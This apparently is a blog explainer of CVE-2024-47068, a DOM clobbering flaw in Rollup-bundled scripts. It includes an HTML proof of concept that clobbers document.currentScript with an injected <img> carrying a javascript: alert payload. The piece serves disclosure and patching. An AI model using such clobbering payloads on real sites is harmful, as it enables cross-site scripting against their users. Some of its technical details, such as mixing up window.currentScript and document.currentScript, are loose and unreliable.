CVE-2024-47068 - Rollup’s DOM Clobbering Vulnerability Explained With Example and Exploit
Rollup is a popular module bundler widely used in building JavaScript applications. In 2024, security researchers identified a major vulnerability—now tracked as CVE-2024-47068—impacting applications that bundle scripts using certain output formats. This post breaks down what this vulnerability is, how it works, and how attackers can exploit it, using simple language and practical examples.
What is DOM Clobbering?
DOM Clobbering is a class of web security issues arising when HTML element attributes (like name) mess with global JavaScript variables and properties. Attackers can insert elements with crafted name attributes so that accessing window.someName (or similar properties) will point to the inserted element instead of what the script expects.
Description
When bundling scripts using cjs, umd, or iife output formats, Rollup could generate output JavaScript that accesses object properties under import.meta (like import.meta.url). If an attacker controls HTML with unsanitized name attributes (for example, in an <img name="something"> tag), they can trigger unexpected behaviors or even cross-site scripting (XSS).
Why is this dangerous?
On websites where user-supplied input is inserted unsanitized into HTML (especially into element name attributes), attackers can break into the JavaScript sandbox, hijack variables, and run scripts within the context of the page—leading to XSS.
Suppose you use Rollup to bundle the following code for browser use (with UMD/IIFE/CJS format)
// someModule.js
console.log('Script loaded from:', import.meta.url);
After running Rollup (prior to the patched version), you might get bundled code similar to
(function() {
'use strict';
// ... some Rollup runtime helpers ...
var scriptUrl = typeof document !== 'undefined' ? document.currentScript && document.currentScript.src || document.baseURI : "";
console.log('Script loaded from:', scriptUrl);
})();
Notice: Sometimes, Rollup-generated code will use window.name or similar ways to access or store runtime values.
The Attack Scenario
Imagine a vulnerable web page where you embed your Rollup-bundled script and also render unsanitized user input as the name attribute of an element:
<img name="currentScript">
<script src="your-bundled-script.js"></script>
In JavaScript, document.currentScript should point to the currently executing <script> element.
- However, in old browsers and sometimes even modern ones, if there is an element with name="currentScript", window.currentScript might point to the <img> element, not the <script>.
Now look at the code
var scriptUrl = document.currentScript && document.currentScript.src
If document.currentScript is hijacked (clobbered) and is not a <script> element, .src might refer to a different attribute, or it might error, or worse, it could be attacker-controlled.
Suppose the attacker injects the following
<img name="currentScript" src="javascript:alert('XSS!')">
And the Rollup-bundled code, due to DOM clobbering, indirectly fetches src from this <img> element and possibly does something unsafe based on its value, leading to XSS.
Here’s a simplified PoC showing direct usage
<!DOCTYPE html>
<html>
<body>
<!-- Attacker controls this -->
<img name="currentScript" src="javascript:alert('Rollup XSS Exploit')">
<script>
// Simulate Rollup-bundled scriptlet
var scriptUrl = document.currentScript && document.currentScript.src;
// Let's see what scriptUrl is:
alert("scriptUrl: " + scriptUrl); // Will alert the img's src (the javascript: URI)
// If somewhere else in the code, scriptUrl is executed, XSS can occur!
// Example:
// location.href = scriptUrl; // BAD IDEA! Would lead to javascript: payload execution
</script>
</body>
</html>
Download Links
- Rollup Releases
Change Notes & Fix:
See official Rollup Security Advisory and upstream fix commit.
Keep dependencies updated: Watch for and apply security patches.
- Do not trust imported global properties: Access document.currentScript and similar objects with caution.
References
- NVD Entry for CVE-2024-47068
- Rollup Security Advisory
- HackerOne Writeup on DOM Clobbering
- Rollup Release Notes
Conclusion
CVE-2024-47068 shows how tiny cracks in our JavaScript build tools—combined with unfortunate browser quirks—can lead to major security issues like XSS. If you use Rollup, upgrade ASAP, and double-check your HTML for unsanitized inputs. For web developers, this is a good reminder: what seems like an ancient browser trick today can bite us hard if we’re not careful tomorrow. Stay safe and keep bundling!
*Copyright © 2024. Exclusive analysis for StackOverflow users and web devs. Stay patched!*
Timeline
Published on: 09/23/2024 16:15:06 UTC
Last modified on: 10/29/2024 16:15:05 UTC